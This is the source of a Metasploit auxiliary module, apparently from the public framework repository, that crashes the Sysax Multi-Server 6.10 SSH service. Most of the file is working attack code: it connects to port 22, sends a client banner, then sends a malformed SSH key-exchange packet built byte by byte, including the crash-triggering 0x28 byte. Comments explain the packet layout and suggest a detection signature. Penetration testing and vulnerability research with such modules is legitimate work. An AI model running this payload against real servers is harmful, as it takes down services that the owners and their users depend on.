GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  # Auxiliary DoS module. A run opens one TCP connection to the target SSH
  # port, sends an OpenSSH-style client banner immediately followed by the
  # fixed-layout key-exchange payload built by #get_packet, attempts one more
  # read, and disconnects. The 'Stability' note declares CRASH_SERVICE_DOWN:
  # the intended outcome is that the remote SSH service stops, and nothing is
  # collected from the target.
  #
  # @param info [Hash] module metadata merged with the defaults below
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service',
        'Description' => %q{
          This module sends a specially-crafted SSH Key Exchange causing the service to
          crash.
        },
        'Author' => 'Matt "hostess" Andreko <mandreko[at]accuvant.com>',
        'License' => MSF_LICENSE,
        'References' => [
          [ 'OSVDB', '92081'],
          [ 'URL', 'https://www.mattandreko.com/2013/04/sysax-multi-server-610-ssh-dos.html']
        ],
        'DisclosureDate' => '2013-03-17',
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    # CLIENTVERSION is appended verbatim to the fixed 'SSH-2.0-OpenSSH_5.1p1 '
    # banner prefix in #run; it only changes the version string the target sees.
    register_options(
      [
        Opt::RPORT(22),
        OptString.new('CLIENTVERSION', [ true, 'The SSH client version to report.', 'Debian-5ubuntu1'])
      ]
    )
  end

  # Builds the key-exchange payload sent right after the client banner.
  #
  # The packed 26-byte prefix reads as an SSH binary-packet header (RFC 4253):
  # a 4-byte packet length 0x00000314 = 788 (this method emits 792 bytes, i.e.
  # 788 plus the length field itself), padding length 0x08, message type 0x14
  # (SSH_MSG_KEXINIT), a 16-byte cookie (0xff .. 0x55), and a 4-byte name-list
  # length 0x0000007e = 126 matching the first alphanumeric field. Every later
  # field is separated by a 3-byte all-zero delimiter rather than a 4-byte
  # length prefix, so the name-lists after the first do not parse as well-formed
  # SSH name-lists; presumably that malformed framing is what the target
  # mishandles, but the exact crash mechanism is not established here.
  #
  # Detection note: the cookie bytes and the 0x28 byte are constant across
  # runs, while the alphanumeric filler is regenerated each call, so a
  # signature on the fixed prefix is more reliable than one on the filler.
  #
  # @return [String] raw packet bytes (792 bytes; binary, not valid text)
  def get_packet
    delimiter = "\x00" * 3
    packet = [
      0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f,
      0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7,
      0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00,
      0x00, 0x7e
    ].pack('C*')
    packet << Rex::Text.rand_text_alphanumeric(126)
    packet << delimiter
    packet << Rex::Text.rand_text_alphanumeric(16)
    packet << delimiter
    packet << Rex::Text.rand_text_alphanumeric(158)
    packet << delimiter
    packet << Rex::Text.rand_text_alphanumeric(158)
    packet << delimiter
    packet << Rex::Text.rand_text_alphanumeric(106)
    packet << delimiter
    packet << Rex::Text.rand_text_alphanumeric(106)
    packet << delimiter
    packet << "\x28" # Magic byte of death - seems to work with just about
                     # anything except \x1a, the value it's supposed to be
    packet << Rex::Text.rand_text_alphanumeric(26)
    packet << delimiter
    packet << Rex::Text.rand_text_alphanumeric(27)
    packet << delimiter * 7 # trailing zeros; the method's value is this last append
  end

  # Module entry point: connect, log the server banner, send the client banner
  # and payload in a single write, read once more, then disconnect.
  #
  # Only Errno::ECONNRESET is rescued around the final read, because the target
  # may close the connection before the read completes; any other socket error
  # (EOF, timeout, refused connection on connect) propagates to the framework.
  # Nothing here checks whether the service actually went down -- the module
  # reports no success or failure beyond the banner line.
  #
  # @return [void]
  def run
    connect

    # get_once may return nil if the server sends nothing before the read
    # completes; fall back to '' so strip below is safe.
    banner = sock.get_once || ''
    print_status("Banner: #{banner.strip}")
    sock.put('SSH-2.0-OpenSSH_5.1p1 ' + datastore['CLIENTVERSION'] + "\r\n" + get_packet)

    # Sometimes the socket closes faster than it can read, sometimes it doesn't, so catch the error just in case.
    begin
      sock.get_once
    rescue Errno::ECONNRESET => e
      vprint_error(e.message)
    end

    disconnect
  end
end